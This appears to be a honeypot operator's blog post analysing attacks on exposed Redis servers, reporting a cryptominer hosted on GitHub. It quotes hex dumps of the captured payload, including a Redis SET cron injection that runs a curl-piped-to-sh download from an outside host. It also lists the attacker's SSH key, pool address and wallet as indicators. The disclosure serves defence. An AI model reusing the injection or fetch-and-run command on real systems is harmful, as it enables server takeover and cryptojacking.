Malware Delivered via GitHub

TCP port 6379 gets a number of strange connections, regularly. These are targetting misconfigured Redis servers. The typical connection is something like the following:

2a330d0a24360d0a434f4e4649470d0a *3..$6..CONFIG..
24330d0a4745540d0a24310d0a2a0d0a $3..GET..$1..*..

636f6e66696720676574206469720d0a config get dir..

696e666f0a info.

We don’t have Redis experience, but these seem to be just testing whether the target server (a honeypot in this instance…) would respond with configuration info. Some of these are likely precursors to other attack, while many are certainly just network scanners learning about the Internet. These examples have the hex dump on the left, and ASCII version on the right, of course.

Many attackers don’t bother enumerating their target before throwing an attack. The one below is like that…

2a330d0a24330d0a5345540d0a24370d *3..$3..SET..$7.
0a637261636b69740d0a2439350d0a2f .crackit..$95../
6e2f6e2f6e2a2f31202a202a202a202a n/n/n*/1 * * * *
206375726c202d6673534c2068747470  curl -fsSL http
733a2f2f7261772e6769746875627573 s://raw.githubus
6572636f6e74656e742e636f6d2f3930 ercontent.com/90
31372f6d696e692f6d61737465722f61 17/mini/master/a
372e7368207c73682f6e2f6e2f6e0d0a 7.sh |sh/n/n/n..

This attacker is taking the, somewhat brazen, step of distributing their cryptocoin miner via GitHub. The username is visible in the URL they’re specifying, “9017”. This is a new-ish user with three forked projects and the “mini” repo - that’s their own.

The a7.sh script uninstalls any cryptominers in a set that may already be installed on the target system. It takes some simple opsec measures for process hiding, installs an iptables rule dropping traffic to “165.225.157.157” (possibly due to this: https://blog.netlab.360.com/old-botnets-never-die-and-ddg-refuse-to-fade-away-en/), installs a public key as authorized for root SSH, and downloads and installs a cryptominer.

The public key is:

AAAAB3NzaC1yc2EAAAADAQABAAABAQCxrBrcpNlLpxz9hmeIY57Ia7/yhEmSqmbDA6w4gDcGcgbmbmVOeoBJvcqDiSxBNho9MfilXPpialmLYr0UCfgHxGjQB8jyHWGI2DfbLLDdP6tPfs7r0F08vY7yVkyh39dKliK/Dlx5tIXzI3t1I7FUkvHm4oPWe5S/6snbLRwCKuwT23o/hZoCuKI7+kdxkZ//UsilHFW0JCs1rdjKFtxCz3hxT3xfK8h4urer0B/hbWNap/rTibRq3UqbIXwMYTgTcKESjS8x10UJzDqKIRqMeJWmsPN4+cLkntgnWi9uuWsmYoLHhFQehOlI4oGImG6vb11K+zEtRvg8UAg3wJ4t

The cryptominer is this one: https://www.virustotal.com/gui/file/52fdf7efddeb0264a45b73deab08c139da2b7b5fff3b31a98e1cef3edc71ce79/detection

We’ve reported this to GitHub, but haven’t seen action in over 24 hours.

Some info about the target for this cryptominer was provided.

{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "id": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
...
    "pools": [
                {
            "url": "47.101.30.124:13531",
            "user": "44jyrKqqad7cvtDP44X2CRAXnhbSf8fPc4R25Vc4myt8PC6orsAMFgUK3FQRSkDNXH73Aak6GgVFv4HU8yan1ugB9z7dZFp.v5201",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": false,
            "variant": 8,
            "tls": false,
            "tls-fingerprint": null
        },
    ],
...
}